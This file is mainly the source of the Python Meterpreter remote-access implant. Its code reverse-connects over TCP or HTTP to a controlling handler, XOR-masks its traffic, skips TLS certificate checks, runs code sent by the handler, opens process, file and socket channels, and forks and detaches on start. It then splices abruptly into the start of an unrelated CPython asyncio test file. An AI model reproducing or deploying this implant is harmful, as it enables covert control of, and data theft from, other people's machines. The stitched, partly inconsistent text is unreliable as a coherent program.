return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
@export
def packet_enum_tlvs(pkt, tlv_type=None):
offset = 0
while offset < len(pkt):
tlv = struct.unpack('>II', pkt[offset:offset + 8])
if tlv_type is None or (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
val = pkt[offset + 8:(offset + 8 + (tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = str(val.split(NULL_BYTE, 1)[0])
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
val = struct.unpack('>Q', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type': tlv[1], 'length': tlv[0], 'value': val}
offset += tlv[0]
return  # PEP 479: a plain return ends the generator; raising StopIteration becomes a RuntimeError on Python 3.7+
@export
def packet_get_tlv(pkt, tlv_type):
try:
tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
except IndexError:
return {}
return tlv
@export
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]}
else:
tlv = args[0]
data = ''
value = tlv['value']
if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
if isinstance(value, float):
value = int(round(value))
data = struct.pack('>III', 12, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
data = struct.pack('>IIQ', 16, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(value))), 'UTF-8')
else:
if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode':
value = value.encode('UTF-8')
elif not is_bytes(value):
value = bytes(value, 'UTF-8')
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
return data
@export
def tlv_pack_response(result, response):
response += tlv_pack(TLV_TYPE_RESULT, result)
response = struct.pack('>I', len(response) + 4) + response
return response
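# Illustrative sketch (not part of the original payload): composing a response body with
# tlv_pack()/tlv_pack_response() and reading it back with packet_get_tlv(). The 4-byte
# length prefix prepended by tlv_pack_response() is skipped before enumerating TLVs.
#
#   body = tlv_pack(TLV_TYPE_STRING, 'hello')
#   resp = tlv_pack_response(ERROR_SUCCESS, body)
#   result_tlv = packet_get_tlv(resp[4:], TLV_TYPE_RESULT)   # value == ERROR_SUCCESS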
#@export
class MeterpreterFile(object):
def __init__(self, file_obj):
self.file_obj = file_obj
def __getattr__(self, name):
return getattr(self.file_obj, name)
export(MeterpreterFile)
#@export
class MeterpreterSocket(object):
def __init__(self, sock):
self.sock = sock
def __getattr__(self, name):
return getattr(self.sock, name)
export(MeterpreterSocket)
#@export
class MeterpreterSocketClient(MeterpreterSocket):
pass
export(MeterpreterSocketClient)
#@export
class MeterpreterSocketServer(MeterpreterSocket):
pass
export(MeterpreterSocketServer)
class STDProcessBuffer(threading.Thread):
def __init__(self, std, is_alive):
threading.Thread.__init__(self)
self.std = std
self.is_alive = is_alive
self.data = bytes()
self.data_lock = threading.RLock()
def run(self):
for byte in iter(lambda: self.std.read(1), bytes()):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
def peek(self, l = None):
data = bytes()
self.data_lock.acquire()
if l == None:
data = self.data
else:
data = self.data[0:l]
self.data_lock.release()
return data
def read(self, l = None):
self.data_lock.acquire()
data = self.peek(l)
self.data = self.data[len(data):]
self.data_lock.release()
return data
#@export
class STDProcess(subprocess.Popen):
def __init__(self, *args, **kwargs):
debug_print('[*] starting process: ' + repr(args[0]))
subprocess.Popen.__init__(self, *args, **kwargs)
self.echo_protection = False
def start(self):
self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
self.stdout_reader.start()
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
self.stderr_reader.start()
def write(self, channel_data):
self.stdin.write(channel_data)
self.stdin.flush()
if self.echo_protection:
end_time = time.time() + 0.5
out_data = bytes()
while (time.time() < end_time) and (out_data != channel_data):
if self.stdout_reader.is_read_ready():
out_data = self.stdout_reader.peek(len(channel_data))
if out_data == channel_data:
self.stdout_reader.read(len(channel_data))
export(STDProcess)
class Transport(object):
def __init__(self):
self.communication_timeout = SESSION_COMMUNICATION_TIMEOUT
self.communication_last = 0
self.retry_total = SESSION_RETRY_TOTAL
self.retry_wait = SESSION_RETRY_WAIT
self.request_retire = False
def __repr__(self):
return "<{0} url='{1}' >".format(self.__class__.__name__, self.url)
@property
def communication_has_expired(self):
return self.communication_last + self.communication_timeout < time.time()
@property
def should_retire(self):
return self.communication_has_expired or self.request_retire
@staticmethod
def from_request(request):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if url.startswith('tcp'):
transport = TcpTransport(url)
elif url.startswith('http'):
proxy = packet_get_tlv(request, TLV_TYPE_TRANS_PROXY_HOST).get('value')
user_agent = packet_get_tlv(request, TLV_TYPE_TRANS_UA).get('value', HTTP_USER_AGENT)
transport = HttpTransport(url, proxy=proxy, user_agent=user_agent)
transport.communication_timeout = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value', SESSION_COMMUNICATION_TIMEOUT)
transport.retry_total = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value', SESSION_RETRY_TOTAL)
transport.retry_wait = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value', SESSION_RETRY_WAIT)
return transport
def _activate(self):
return True
def activate(self):
end_time = time.time() + self.retry_total
while time.time() < end_time:
try:
activate_succeeded = self._activate()
except:
activate_succeeded = False
if activate_succeeded:
self.communication_last = time.time()
return True
time.sleep(self.retry_wait)
return False
def _deactivate(self):
return
def deactivate(self):
try:
self._deactivate()
except:
pass
self.communication_last = 0
return True
def get_packet(self):
self.request_retire = False
try:
pkt = self._get_packet()
except:
return None
if pkt is None:
return None
self.communication_last = time.time()
return pkt
def send_packet(self, pkt):
self.request_retire = False
try:
xor_key = rand_xor_key()
raw = struct.pack('BBBB', *xor_key[::-1]) + xor_bytes(xor_key, pkt)
self._send_packet(raw)
except:
return False
self.communication_last = time.time()
return True
def tlv_pack_timeouts(self):
response = tlv_pack(TLV_TYPE_TRANS_COMM_TIMEOUT, self.communication_timeout)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_TOTAL, self.retry_total)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_WAIT, self.retry_wait)
return response
def tlv_pack_transport_group(self):
trans_group = tlv_pack(TLV_TYPE_TRANS_URL, self.url)
trans_group += self.tlv_pack_timeouts()
return trans_group
class HttpTransport(Transport):
def __init__(self, url, proxy=None, user_agent=None):
super(HttpTransport, self).__init__()
opener_args = []
scheme = url.split(':', 1)[0]
if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2, 7, 9)) or sys.version_info >= (3, 4, 3)):
import ssl
ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE
opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
if proxy:
opener_args.append(urllib.ProxyHandler({scheme: proxy}))
self.proxy = proxy
opener = urllib.build_opener(*opener_args)
if user_agent:
opener.addheaders = [('User-Agent', user_agent)]
self.user_agent = user_agent
urllib.install_opener(opener)
self.url = url
self._http_request_headers = {'Content-Type': 'application/octet-stream'}
self._first_packet = None
self._empty_cnt = 0
def _activate(self):
return True
self._first_packet = None
packet = self._get_packet()
if packet is None:
return False
self._first_packet = packet
return True
def _get_packet(self):
if self._first_packet:
packet = self._first_packet
self._first_packet = None
return packet
packet = None
xor_key = None
request = urllib.Request(self.url, None, self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
packet = url_h.read()
for _ in range(1):
if packet == '':
break
if len(packet) < 12:
packet = None # looks corrupt
break
xor_key = struct.unpack('BBBB', packet[:4][::-1])
header = xor_bytes(xor_key, packet[4:12])
pkt_length, _ = struct.unpack('>II', header)
if len(packet) - 4 != pkt_length:
packet = None # looks corrupt
        if not packet:
            # Nothing received: back off before the next poll. _empty_cnt only
            # grows, so the >= 0 branch always fires and the delay works out to
            # 100 ms * _empty_cnt, capped at 10 seconds.
            delay = 10 * self._empty_cnt
            if self._empty_cnt >= 0:
                delay *= 10
            self._empty_cnt += 1
            time.sleep(float(min(10000, delay)) / 1000)
return packet
self._empty_cnt = 0
return xor_bytes(xor_key, packet[12:])
def _send_packet(self, packet):
request = urllib.Request(self.url, packet, self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
response = url_h.read()
def patch_uri_path(self, new_path):
match = re.match(r'https?://[^/]+(/.*$)', self.url)
if match is None:
return False
self.url = self.url[:match.span(1)[0]] + new_path
return True
def tlv_pack_transport_group(self):
trans_group = super(HttpTransport, self).tlv_pack_transport_group()
if self.user_agent:
trans_group += tlv_pack(TLV_TYPE_TRANS_UA, self.user_agent)
if self.proxy:
trans_group += tlv_pack(TLV_TYPE_TRANS_PROXY_HOST, self.proxy)
return trans_group
class TcpTransport(Transport):
def __init__(self, url, socket=None):
super(TcpTransport, self).__init__()
self.url = url
self.socket = socket
self._cleanup_thread = None
self._first_packet = True
def _sock_cleanup(self, sock):
remaining_time = self.communication_timeout
while remaining_time > 0:
iter_start_time = time.time()
if select.select([sock], [], [], remaining_time)[0]:
if len(sock.recv(4096)) == 0:
break
remaining_time -= time.time() - iter_start_time
sock.close()
def _activate(self):
address, port = self.url[6:].rsplit(':', 1)
port = int(port.rstrip('/'))
timeout = max(self.communication_timeout, 30)
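        # A blank or wildcard address means bind locally and wait for the handler
        # to connect; anything else is treated as a reverse-connect target.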
if address in ('', '0.0.0.0', '::'):
try:
server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except (AttributeError, socket.error):
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.bind(('', port))
server_sock.listen(1)
if not select.select([server_sock], [], [], timeout)[0]:
server_sock.close()
return False
sock, _ = server_sock.accept()
server_sock.close()
else:
if ':' in address:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((address, port))
sock.settimeout(None)
self.socket = sock
self._first_packet = True
return True
    def _deactivate(self):
        # Drain and close the old socket in a background thread so switching
        # transports does not block for up to communication_timeout seconds.
        cleanup = threading.Thread(target=self._sock_cleanup, args=(self.socket,))
        cleanup.start()
        self.socket = None
def _get_packet(self):
first = self._first_packet
self._first_packet = False
if not select.select([self.socket], [], [], 0.5)[0]:
return ''
packet = self.socket.recv(12)
        if len(packet) == 0:  # remote side closed the connection (works for str and bytes)
self.request_retire = True
return None
if len(packet) != 12:
if first and len(packet) == 4:
received = 0
header = packet[:4]
pkt_length = struct.unpack('>I', header)[0]
self.socket.settimeout(max(self.communication_timeout, 30))
while received < pkt_length:
received += len(self.socket.recv(pkt_length - received))
self.socket.settimeout(None)
return self._get_packet()
return None
xor_key = struct.unpack('BBBB', packet[:4][::-1])
header = xor_bytes(xor_key, packet[4:12])
pkt_length, pkt_type = struct.unpack('>II', header)
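        # The length field counts the 8-byte header as well as the body.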
pkt_length -= 8
packet = bytes()
while len(packet) < pkt_length:
packet += self.socket.recv(pkt_length - len(packet))
return xor_bytes(xor_key, packet)
def _send_packet(self, packet):
self.socket.send(packet)
@classmethod
def from_socket(cls, sock):
url = 'tcp://'
address, port = sock.getsockname()[:2]
# this will need to be changed if the bind stager ever supports binding to a specific address
        if address not in ('', '0.0.0.0', '::'):
address, port = sock.getpeername()[:2]
url += address + ':' + str(port)
return cls(url, sock)
class PythonMeterpreter(object):
def __init__(self, transport):
self.transport = transport
self.running = False
self.last_registered_extension = None
self.extension_functions = {}
self.channels = {}
self.next_channel_id = 1
self.interact_channels = []
self.processes = {}
self.next_process_id = 1
self.transports = [self.transport]
self.session_expiry_time = SESSION_EXPIRATION_TIMEOUT
self.session_expiry_end = time.time() + self.session_expiry_time
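        # Every method named _core_* is auto-registered as a command handler; the
        # leading underscore is stripped to form the wire method name.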
for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
self.extension_functions[func[1:]] = getattr(self, func)
self.running = True
def register_extension(self, extension_name):
self.last_registered_extension = extension_name
return self.last_registered_extension
def register_function(self, func):
self.extension_functions[func.__name__] = func
return func
def register_function_windll(self, func):
if has_windll:
self.register_function(func)
return func
def add_channel(self, channel):
assert(isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket)))
idx = self.next_channel_id
self.channels[idx] = channel
debug_print('[*] added channel id: ' + str(idx) + ' type: ' + channel.__class__.__name__)
self.next_channel_id += 1
return idx
def add_process(self, process):
idx = self.next_process_id
self.processes[idx] = process
debug_print('[*] added process id: ' + str(idx))
self.next_process_id += 1
return idx
def get_packet(self):
pkt = self.transport.get_packet()
if pkt is None and self.transport.should_retire:
self.transport_change()
return pkt
def send_packet(self, packet):
send_succeeded = self.transport.send_packet(packet)
if not send_succeeded and self.transport.should_retire:
self.transport_change()
return send_succeeded
@property
def session_has_expired(self):
if self.session_expiry_time == 0:
return False
return time.time() > self.session_expiry_end
def transport_add(self, new_transport):
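        # Insert the new transport just before the currently active one in the rotation.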
new_position = self.transports.index(self.transport)
self.transports.insert(new_position, new_transport)
def transport_change(self, new_transport=None):
if new_transport is None:
new_transport = self.transport_next()
self.transport.deactivate()
debug_print('[*] changing transport to: ' + new_transport.url)
while not new_transport.activate():
new_transport = self.transport_next(new_transport)
debug_print('[*] changing transport to: ' + new_transport.url)
self.transport = new_transport
def transport_next(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) + 1
if new_idx == len(self.transports):
new_idx = 0
return self.transports[new_idx]
def transport_prev(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) - 1
if new_idx == -1:
new_idx = len(self.transports) - 1
return self.transports[new_idx]
def run(self):
while self.running and not self.session_has_expired:
request = self.get_packet()
if request:
response = self.create_response(request)
if response:
self.send_packet(response)
continue
# iterate over the keys because self.channels could be modified if one is closed
channel_ids = list(self.channels.keys())
for channel_id in channel_ids:
channel = self.channels[channel_id]
data = bytes()
if isinstance(channel, STDProcess):
                    if channel_id not in self.interact_channels:
continue
if channel.stderr_reader.is_read_ready():
data = channel.stderr_reader.read()
elif channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read()
                    elif channel.poll() is not None:
self.handle_dead_resource_channel(channel_id)
elif isinstance(channel, MeterpreterSocketClient):
while select.select([channel.fileno()], [], [], 0)[0]:
try:
d = channel.recv(1)
except socket.error:
d = bytes()
if len(d) == 0:
self.handle_dead_resource_channel(channel_id)
break
data += d
elif isinstance(channel, MeterpreterSocketServer):
if select.select([channel.fileno()], [], [], 0)[0]:
(client_sock, client_addr) = channel.accept()
server_addr = channel.getsockname()
client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock))
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'tcp_channel_open')
pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, client_channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_PARENTID, channel_id)
pkt += tlv_pack(TLV_TYPE_LOCAL_HOST, inet_pton(channel.family, server_addr[0]))
pkt += tlv_pack(TLV_TYPE_LOCAL_PORT, server_addr[1])
pkt += tlv_pack(TLV_TYPE_PEER_HOST, inet_pton(client_sock.family, client_addr[0]))
pkt += tlv_pack(TLV_TYPE_PEER_PORT, client_addr[1])
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
if data:
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
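    # Forget a channel whose backing resource has died and tell the handler to
    # close it by sending a core_channel_close request.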
def handle_dead_resource_channel(self, channel_id):
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
    def _core_set_uuid(self, request, response):
        # PAYLOAD_UUID is module-level state; without the global declaration the
        # assignment below would only bind a local and the UUID would never change.
        global PAYLOAD_UUID
        new_uuid = packet_get_tlv(request, TLV_TYPE_UUID)
        if new_uuid:
            PAYLOAD_UUID = binascii.b2a_hex(new_uuid['value'])
        return ERROR_SUCCESS, response
def _core_enumextcmd(self, request, response):
extension_name = packet_get_tlv(request, TLV_TYPE_STRING)['value']
for func_name in self.extension_functions.keys():
if func_name.split('_', 1)[0] == extension_name:
response += tlv_pack(TLV_TYPE_STRING, func_name)
return ERROR_SUCCESS, response
def _core_machine_id(self, request, response):
serial = ''
machine_name = platform.uname()[1]
if has_windll:
from ctypes import wintypes
k32 = ctypes.windll.kernel32
sys_dir = ctypes.create_unicode_buffer(260)
if not k32.GetSystemDirectoryW(ctypes.byref(sys_dir), 260):
                return ERROR_FAILURE_WINDOWS, response  # handlers return an (error, response) pair
vol_buf = ctypes.create_unicode_buffer(260)
fs_buf = ctypes.create_unicode_buffer(260)
serial_num = wintypes.DWORD(0)
if not k32.GetVolumeInformationW(ctypes.c_wchar_p(sys_dir.value[:3]),
vol_buf, ctypes.sizeof(vol_buf), ctypes.byref(serial_num), None,
None, fs_buf, ctypes.sizeof(fs_buf)):
                return ERROR_FAILURE_WINDOWS, response
serial_num = serial_num.value
serial = "%04x" % ((serial_num >> 16) & 0xffff) + '-' "%04x" % (serial_num & 0xffff)
else:
serial = get_hdd_label()
response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
return ERROR_SUCCESS, response
def _core_native_arch(self, request, response):
response += tlv_pack(TLV_TYPE_STRING, get_native_arch())
return ERROR_SUCCESS, response
def _core_patch_url(self, request, response):
if not isinstance(self.transport, HttpTransport):
return ERROR_FAILURE, response
new_uri_path = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if not self.transport.patch_uri_path(new_uri_path):
return ERROR_FAILURE, response
return ERROR_SUCCESS, response
def _core_loadlib(self, request, response):
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE, response
self.last_registered_extension = None
symbols_for_extensions = {'meterpreter':self}
symbols_for_extensions.update(EXPORTED_SYMBOLS)
i = code.InteractiveInterpreter(symbols_for_extensions)
i.runcode(compile(data_tlv['value'], '', 'exec'))
extension_name = self.last_registered_extension
if extension_name:
check_extension = lambda x: x.startswith(extension_name)
lib_methods = list(filter(check_extension, list(self.extension_functions.keys())))
for method in lib_methods:
response += tlv_pack(TLV_TYPE_METHOD, method)
return ERROR_SUCCESS, response
def _core_shutdown(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, True)
self.running = False
return ERROR_SUCCESS, response
def _core_transport_add(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
return ERROR_SUCCESS, response
def _core_transport_change(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_list(self, request, response):
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += tlv_pack(TLV_TYPE_TRANS_GROUP, self.transport.tlv_pack_transport_group())
transport = self.transport_next()
while transport != self.transport:
response += tlv_pack(TLV_TYPE_TRANS_GROUP, transport.tlv_pack_transport_group())
transport = self.transport_next(transport)
return ERROR_SUCCESS, response
def _core_transport_next(self, request, response):
new_transport = self.transport_next()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_prev(self, request, response):
new_transport = self.transport_prev()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_remove(self, request, response):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if self.transport.url == url:
return ERROR_FAILURE, response
transport_found = False
for transport in self.transports:
if transport.url == url:
transport_found = True
break
if transport_found:
self.transports.remove(transport)
return ERROR_SUCCESS, response
return ERROR_FAILURE, response
def _core_transport_set_timeouts(self, request, response):
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
        if timeout_value is not None:
self.session_expiry_time = timeout_value
self.session_expiry_end = time.time() + self.session_expiry_time
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value')
if timeout_value:
self.transport.communication_timeout = timeout_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value')
if retry_value:
self.transport.retry_total = retry_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value')
if retry_value:
self.transport.retry_wait = retry_value
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += self.transport.tlv_pack_timeouts()
return ERROR_SUCCESS, response
def _core_transport_sleep(self, request, response):
seconds = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT)['value']
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
if seconds:
self.transport.deactivate()
time.sleep(seconds)
if not self.transport.activate():
self.transport_change()
return None
def _core_channel_open(self, request, response):
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
handler = 'channel_open_' + channel_type['value']
if handler not in self.extension_functions:
return error_result(NotImplementedError), response
handler = self.extension_functions[handler]
return handler(request, response)
def _core_channel_close(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
if isinstance(channel, subprocess.Popen):
channel.kill()
elif isinstance(channel, MeterpreterFile):
channel.close()
elif isinstance(channel, MeterpreterSocket):
channel.close()
else:
return ERROR_FAILURE, response
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
debug_print('[*] closed and removed channel id: ' + str(channel_id))
return ERROR_SUCCESS, response
def _core_channel_eof(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
result = False
if isinstance(channel, MeterpreterFile):
result = channel.tell() >= os.fstat(channel.fileno()).st_size
response += tlv_pack(TLV_TYPE_BOOL, result)
return ERROR_SUCCESS, response
def _core_channel_interact(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
if toggle:
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
else:
self.interact_channels.append(channel_id)
elif channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_read(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
data = ''
if isinstance(channel, STDProcess):
            if channel.poll() is not None:
self.handle_dead_resource_channel(channel_id)
if channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read(length)
elif isinstance(channel, MeterpreterFile):
data = channel.read(length)
elif isinstance(channel, MeterpreterSocket):
data = channel.recv(length)
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
return ERROR_SUCCESS, response
def _core_channel_write(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
l = len(channel_data)
if isinstance(channel, subprocess.Popen):
            if channel.poll() is not None:
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
channel.write(channel_data)
elif isinstance(channel, MeterpreterFile):
channel.write(channel_data)
elif isinstance(channel, MeterpreterSocket):
try:
l = channel.send(channel_data)
except socket.error:
channel.close()
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_LENGTH, l)
return ERROR_SUCCESS, response
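    # Dispatch a request packet to its registered handler and build the TLV
    # response, echoing back the method name, payload UUID and request id.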
def create_response(self, request):
resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
resp += tlv_pack(method_tlv)
resp += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
handler_name = method_tlv['value']
if handler_name in self.extension_functions:
handler = self.extension_functions[handler_name]
try:
debug_print('[*] running method ' + handler_name)
result = handler(request, resp)
if result is None:
return
result, resp = result
except Exception:
debug_print('[-] method ' + handler_name + ' resulted in an error')
if DEBUGGING:
traceback.print_exc(file=sys.stderr)
result = error_result()
else:
if result != ERROR_SUCCESS:
debug_print('[-] method ' + handler_name + ' resulted in error: #' + str(result))
else:
debug_print('[-] method ' + handler_name + ' was requested but does not exist')
result = error_result(NotImplementedError)
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
if not reqid_tlv:
return
resp += tlv_pack(reqid_tlv)
return tlv_pack_response(result, resp)
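# Entry point: fork where available so the parent can exit, detach from the
# controlling terminal via setsid(), then build the configured transport and run.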
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
if hasattr(os, 'setsid'):
try:
os.setsid()
except OSError:
pass
if HTTP_CONNECTION_URL and has_urllib:
transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT)
else:
# PATCH-SETUP-STAGELESS-TCP-SOCKET #
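        # 's' is expected to be the already-connected socket prepared by the
        # stager code injected at the patch marker above.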
transport = TcpTransport.from_socket(s)
met = PythonMeterpreter(transport)
# PATCH-SETUP-TRANSPORTS #
met.run()
|
test_events.py
|
"""Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
from test.support import ALWAYS_EQ, LARGEST, SMALLEST
def tearDownModule():
asyncio.set_event_loop_policy(None)
def broken_unix_getsockname():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform.startswith("aix"):
return True
elif sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
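# Minimal protocol used throughout these tests: it tracks connection state,
# counts received bytes, and resolves the 'connected'/'done' futures.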
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
